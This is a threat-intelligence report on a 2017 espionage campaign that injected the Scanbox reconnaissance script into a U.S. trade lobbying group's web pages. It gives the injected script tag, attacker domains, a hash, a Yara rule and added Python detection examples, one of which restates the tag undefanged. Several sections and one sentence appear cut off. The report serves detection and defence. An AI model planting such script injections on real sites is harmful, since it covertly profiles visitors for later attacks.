Operation TradeSecret: Cyber Espionage at the Heart of Global Trade
By Fidelis Cybersecurity Team
April 7, 2017
In late February, Fidelis Cybersecurity observed a strategic web compromise on a prominent U.S. lobbying group that served up malware to a very specific set of targets. The malware we observed has been used exclusively by Chinese nation-state threat actors in our observation and according to previously published research.
Based on our observations, we estimate that it is highly probable that this activity -- which we're calling 'Operation TradeSecret' -- targeted key private-sector players involved in lobbying efforts around United States' foreign trade policy. Subsequent research has led us to recover artifacts that indicate that a similar operation was conducted by threat actors targeting government officials in Japan. The connections we can draw from the Japanese campaign lead us to estimate that it is highly probable that the actors involved are known as APT10 (aka Stone Panda) in the threat research community.
Trade policy was at the center of the recent U.S. presidential election and is sure to feature prominently on the agenda when President Trump meets for the first time with China President Xi Jinping in Florida this week.
This paper documents our findings around the live campaign we observed, as well as technical details to allow other researchers to extend visibility into these actions. Fidelis Cybersecurity products detect all activity described in this report.
Fidelis observed, between February 27 and March 1, specific pages on the website of the National Foreign Trade Council (NFTC) including a link that led to a remote script that would execute when anyone visited that page. That remote script was the Scanbox framework, a well-known web reconnaissance tool that has been observed in previous campaigns dating back to at least 2014.
We first observed the inject on the registration page for a board of directors meeting in Washington D.C., scheduled for March 7, 2017.
The injected link would run the Scanbox framework on the computer of anyone who visited the web page.
The link from the NFTC site was removed on March 2. In our observation, the link was removed after the Scanbox site was taken down. We believe that the operation had almost certainly concluded by that time.
Scanbox was previously reported to have been used by multiple Chinese actor groups that are believed to be state sponsored, including the ones thought to be behind well-publicized intrusions in recent years -- namely, the Anthem Healthcare and the U.S. Office of Personnel Management (OPM) breaches.
Fidelis has previously observed Scanbox in various campaigns. In the most recent incident, we observed that it was inserted on a Uyghur cultural news site. The Uyghurs are an ethnic minority group in Xinjiang province in China, where a struggle for political rights has been ongoing for a few decades. In that instance, the framework was hosted here: support1.freetcp[ . ]com.
A web-cache listing the NFTC board of directors is here. These organizations represent some of the largest U.S. private sector companies that, presumably, have a keen interest in U.S. trade policy. Since the strategic web compromise was observed on the registration page for the board of directors meeting, it can be surmised that the campaign targeted the individuals visiting the site to register for the meeting.
NFTC members have been key participants in the dialogue around the composition of the new trade policy framework being formulated within the Trump administration. One example of this is the advocacy for the appointment of a new U.S. Trade Representative, as evidenced by this statement issued by the Chair of the NFTC on February 13.
All organizations that have representatives on the board of directors of the NFTC -- or those who would have a reason to visit the site -- should investigate potentially impacted hosts using indicators provided in this report. Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks -- such as spearphishing campaigns.
Cybersecurity conveyed its findings to NFTC shortly after our initial
According to PwC and AlienVault, the Scanbox framework has various plugins that will load depending on the browser, including:
Software reconnaissance / enumeration
Other features identified are:
Operating system identification
Reconnaissance is used to allow attackers to later launch attacks against system vulnerabilities based on data obtained from the system.
In the NFTC page, the injected code was:
<script src=hxxp://club.personanddog [ . ] info/file/i/?1></script>
The above reference points to "1.js" on that server. Research on this domain led us to the following "1.js" file on VirusTotal, which appears to be the one hosted at the above-referenced domain: c88b11367a1f4625d4e7a8fb3a45f4c5.
The “1.js” file was first submitted to VirusTotal and Hybrid-Analysis[ . ]com on March 1, 2017. As of March 7, 2017, this Scanbox script has zero (0) AV detections as observed by a popular scanner. During analysis of the script, we discovered that this is an obfuscated version of the Scanbox script. Key changes have been made to variables in order to bypass classic signature detections.
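As an added example (not code from the Fidelis report), a small Python check a site owner could run over their own pages to flag script tags that load from hosts outside an expected allowlist. The sample page and the allowlist host are constructed; the injected tag is the one quoted above with the defanging removed so a parser can read it.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page fragment in the same shape as the injected tag
# described in the report (the "hxxp" / "[ . ]" defanging is restored here).
SAMPLE_HTML = """
<html><head>
<script src="/js/jquery.min.js"></script>
<script src="https://www.example-nftc-cdn.test/site.js"></script>
<script src=http://club.personanddog.info/file/i/?1></script>
</head><body>Board of Directors Meeting registration</body></html>
"""

# Hosts the site owner actually expects to serve script (assumed allowlist).
ALLOWED_SCRIPT_HOSTS = {"www.example-nftc-cdn.test"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, quoted or unquoted."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def unexpected_script_hosts(html, allowed_hosts):
    """Return script sources whose host is external and not on the allowlist."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = urlparse(src).hostname
        if host is None:          # relative path: served by the site itself
            continue
        if host.lower() not in allowed_hosts:
            findings.append(src)
    return findings


if __name__ == "__main__":
    for src in unexpected_script_hosts(SAMPLE_HTML, ALLOWED_SCRIPT_HOSTS):
        print("unexpected external script:", src)
```

Run the same check against a cached or freshly fetched copy of each page on a schedule, so a newly injected remote script shows up as a diff rather than after the fact.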
When the observed Scanbox script runs, the visitor’s system is observed performing the following requests:
To draw a clear connection between the de-obfuscated version of the 1.js script and the raw Scanbox script, consider the following section from the code:
After making some replacements, the following segment of the code will clearly look like the Scanbox script that has been reported by multiple researchers:
Scanbox domain: other GET requests associated with club.personanddog[ . ]info
Open-source research led us to discover multiple requests associated with the Scanbox domain.
This information led us to believe that the Scanbox script could have also been injected in the following pages on the NFTC website:
Report completed on "2017-02-27 15:16:39 CET"
NFTC Board of Directors Meeting
Report completed on "2017-02-28 00:14:04 CET"
NFTC Board Dinner with Mexico's Ambassador, Geronimo Gutierrez (By Invitation)
Report completed on "2017-02-28 09:19:36 CET"
Report completed on "2017-02-28 11:20:37 CET"
Report completed on "2017-03-01 01:53:08 CET"
NFTC Welcomes New Chairman Ambassador
Other Scanbox Observations – Ministry of Foreign Affairs, Japan
When the script is accessed, the victim system beaconed to www[ . ]anzen.mofa-go-jp[ . ]com, a site masquerading as anzen.mofa.go.jp, a page on the Ministry's website focused on overseas safety. It should be noted that this domain is specifically listed in the Operation CloudHopper report.
The following traffic was observed:
Yara Detection Rule
The following Yara rule could be used to detect the obfuscated version of the Scanbox Framework script observed in this research:
// Rule header, meta block and section keywords are supplied here so the rule compiles;
// the strings and the condition are as published in this report.
rule Scanbox_Obfuscated_TradeSecret
{
    meta:
        description = "Obfuscated Scanbox framework script observed in Operation TradeSecret"
        reference = "Fidelis Cybersecurity, April 7, 2017"
    strings:
        $sa1 = /(var|new|return)\s[_\$]+\s?/
        $sa2 = "function"
        $sa3 = "toString"
        $sa4 = "toUpperCase"
        $sa5 = "arguments.length"
        $sa6 = "return"
        $sa7 = "while"
        $sa8 = "unescape("
        $sa9 = "365*10*24*60*60*1000"
        $sa10 = ">> 2"
        $sa11 = "& 3) << 4"
        $sa12 = "& 15) << 2"
        $sa13 = ">> 6) | 192"
        $sa14 = "& 63) | 128"
        $sa15 = ">> 12) | 224"
    condition:
        all of them
}
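As an added example (not part of the report), the same markers checked in Python so the rule's "all of them" logic can be exercised without a Yara install. Both JavaScript samples are constructed stand-ins, not Scanbox code; the positive one only reproduces the identifier style, the ten-year cookie lifetime and the UTF-8/base64 encoder arithmetic that the rule's strings key on.

```python
import re

# Markers from the Yara rule above: one regex plus fixed substrings. The
# arithmetic fragments are the shifts and masks of a UTF-8 encoder and a
# base64 encoder, which the variable renaming left untouched.
SCANBOX_REGEX = re.compile(r"(var|new|return)\s[_$]+\s?")
SCANBOX_STRINGS = [
    "function", "toString", "toUpperCase", "arguments.length", "return",
    "while", "unescape(", "365*10*24*60*60*1000", ">> 2", "& 3) << 4",
    "& 15) << 2", ">> 6) | 192", "& 63) | 128", ">> 12) | 224",
]


def missing_markers(js_text):
    """Return the rule markers absent from js_text; empty means 'all of them' matched."""
    missing = [s for s in SCANBOX_STRINGS if s not in js_text]
    if not SCANBOX_REGEX.search(js_text):
        missing.append("regex:(var|new|return)\\s[_$]+\\s?")
    return missing


def matches_scanbox_rule(js_text):
    """Equivalent of the rule's 'all of them' condition."""
    return not missing_markers(js_text)


# Constructed positive sample (a stand-in, not Scanbox code): carries the
# "var _$" identifier style, the ten-year cookie expiry and the encoder
# arithmetic the rule keys on.
POSITIVE_SAMPLE = """
var _$ = function (s) {
  var out = "", i = 0;
  while (i < s.length) {
    var c = s.charCodeAt(i++);
    if (c < 128) { out += String.fromCharCode(c); }
    else if (c < 2048) { out += String.fromCharCode((c >> 6) | 192, (c & 63) | 128); }
    else { out += String.fromCharCode((c >> 12) | 224, ((c >> 6) & 63) | 128, (c & 63) | 128); }
  }
  return out;
};
function b64triple(b) {
  var a = b[0] >> 2, c = ((b[0] & 3) << 4) | (b[1] >> 4), d = ((b[1] & 15) << 2) | (b[2] >> 6);
  return a.toString(16).toUpperCase();
}
function cookieExpiry() { return arguments.length ? new Date(Date.now() + 365*10*24*60*60*1000) : unescape("%20"); }
"""

# Constructed negative sample: ordinary page script sharing a few common
# words but none of the encoder arithmetic or the cookie lifetime.
NEGATIVE_SAMPLE = 'function ready() { var nav = document.getElementById("nav"); return nav.toString(); }'
```

Because the common keywords match almost any script, the discriminating value sits in the cookie lifetime and the six arithmetic fragments; dropping those from a local copy of the rule to "trim" it would make it fire on ordinary base64 helpers.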